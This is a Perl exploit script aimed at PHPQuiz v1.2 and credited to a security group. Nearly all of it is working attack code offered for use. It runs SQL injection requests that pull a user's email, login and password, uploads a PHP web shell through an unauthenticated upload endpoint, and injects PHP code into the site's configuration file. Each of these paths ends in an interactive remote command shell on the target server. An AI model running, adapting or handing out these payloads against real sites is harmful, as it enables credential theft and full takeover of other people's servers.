######################################################
#***************************
#**********************
#********************
#***********************************************************************************
#!/usr/bin/perl
use IO::Socket ;
use LWP::Simple ;
print q(
/-----------------------------------------------------------\
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
| Coded by simo64 - simo64_morx.org |
www.morx.org |
---|
MorX Security Research Team © |
\-----------------------------------------------------------/ |
);
sub usage(){
print "\nUsage :perl $0 siteurl /path/ userid\n";
print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n";
}
if(!@ARGV){
&usage();
exit(0)
}
$host = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$success = null ;
$injected = 0;
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)";
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/";
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/";
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
syswrite STDOUT , "Connecting to $host …";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n\nUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data …";
print $sock "GET $path$injectmail HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Connection: Close\n\n";
while($res = <$sock>){
if($res =~ /anim_fleche_droite.gif" border="0">&nbsp;&quot;(.*?)&quot;<\/a>/){
$usermail = $1 ;
$success = "ok" ;
}
}
if($success eq "ok") {
syswrite STDOUT , "\n\nSQL injection Succeded !\n\n";
sleep 2 ;
syswrite STDOUT , "\tUser EMail : $usermail\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectuser HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Connection: Close\n\n";
while($res = <$sock>){
if($res =~ />&nbsp;&quot;(.*?)&quot;/){
$userlogin = $1 ;
}
}
syswrite STDOUT , "\tUser Login : $userlogin\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectpass HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Connection: Close\n\n";
while($res = <$sock>){
if($res =~ />&nbsp;&quot;(.*?)&quot;/){
$userpass = $1 ;
}
}
syswrite STDOUT , "\tUser Passwd : $userpass\n\n";
} else {print "\n\nInjecting credentials Exploit Failed !\n\n";}
sleep 2;
syswrite STDOUT , "\n[+] Exec CMD by uploading a shell";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n\nUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "\tConnected !\n\n";
syswrite STDOUT , "Uploading shell …";
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"
/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="image"; filename="zaz.php"
Content-Type: text/plain
<?php
if (get_magic_quotes_gpc()){$_GET[\'cmd\']=stripslashes($_GET[\'cmd\']);}
passthru($_GET[\'cmd\']);
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"
Upload
-----------------------------7d61592213049c–
';
$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./…/img_quiz/zaz.php";
$len = length $data ;
print $sock "POST $script HTTP/1.0\r\n";
print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
print $sock "Host: $host\r\n";
print $sock "Content-Length: $len\r\n";
print $sock "Connection: close\r\n\r\n";
print $sock $data;
syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded … ";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0\r\n";
print $sock "Host: $host\r\n";
print $sock "Connection: close\n\n";
while($rep = <$sock>){
if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; }
}
if($success == 1){
print "\t[OK]\n\n\t\tNOW YOU CAN LAUNCH COMMANDS\n\n";
while(){
print "simo64[at]morx.org :~\$ ";
chop($cmd=<STDIN>);
exit() if ($cmd eq 'exit');
$result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");
print $result;
}
}
else { print "\tFailed !\n\nFile Upload Failed\n\n" }
print "\n[+] Injecting PHP Code…\n\nConnecting …";
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "Connot Connect to $host !" unless($sock);
print "\tConnected !\n\nSending Data …\t";
print $sock "GET $phpinject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: MorX-Zilla\n";
print $sock "Connection: Close\n\n";
print "\t OK\n\nChecking if code injected …";
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $injcheck HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: MorX-Zilla\n";
print $sock "Connection: Close\n\n";
while($check = <$sock>){
if($check =~ /l3fou/) { $injected = 1; }
}
if($injected == 1 ){
print "\tSucceded !\n\n\tNOW YOU ARE IN !\n\n";
while(){
print "simo\@morx.org :~\$ ";
$cmd = <STDIN>;
chop($cmd);
exit(0) if($cmd eq "exit");
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");
print $result;
}
}
else {print "\tFailed\n\nPHPCode Injection Failed !\n\n";}